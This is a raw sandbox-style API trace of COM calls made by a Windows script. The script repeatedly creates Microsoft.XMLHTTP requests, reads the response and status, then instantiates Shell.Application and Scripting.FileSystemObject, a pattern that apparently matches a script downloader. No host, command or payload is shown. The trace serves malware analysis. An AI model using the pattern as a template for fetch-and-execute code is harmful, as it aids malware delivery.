	[0467.737] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.737] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0467.738] ??2@YAPEAX_K@Z () returned 0x62f310
	[0467.738] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.738] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0467.738] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.738] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.738] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.738] SysStringLen (param_1=0x0) returned 0x0
	[0467.738] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.738] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0467.738] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0467.738] ??2@YAPEAX_K@Z () returned 0x62f330
	[0467.739] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.739] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0467.739] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.739] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.739] longjmp () 
	[0467.739] longjmp () 
	[0467.739] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.739] SysStringLen (param_1=0x0) returned 0x0
	[0467.739] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.739] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0467.739] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.739] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0467.740] ??2@YAPEAX_K@Z () returned 0x62f310
	[0467.740] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0467.740] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.740] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0467.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0467.740] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0467.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.740] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.740] longjmp () 
	[0467.740] longjmp () 
	[0467.740] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.740] SysStringLen (param_1=0x0) returned 0x0
	[0467.740] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.740] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.741] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0467.741] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0467.741] ??2@YAPEAX_K@Z () returned 0x62f330
	[0467.741] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.741] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0467.741] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.741] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.741] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0467.741] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0469.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0469.334] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0469.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0469.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0469.334] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0469.334] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0469.334] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0469.334] SysStringLen (param_1=0x0) returned 0x0
	[0469.334] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0469.335] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0469.335] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0469.335] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0469.335] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0469.335] ??2@YAPEAX_K@Z () returned 0x62f350
	[0469.335] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0469.335] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0469.335] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0469.335] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0469.335] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0469.335] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0469.335] SysStringLen (param_1=0x0) returned 0x0
	[0469.335] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0469.339] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0469.339] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0469.339] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0469.339] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0469.339] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0469.339] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0470.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0470.785] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0470.785] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0470.786] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
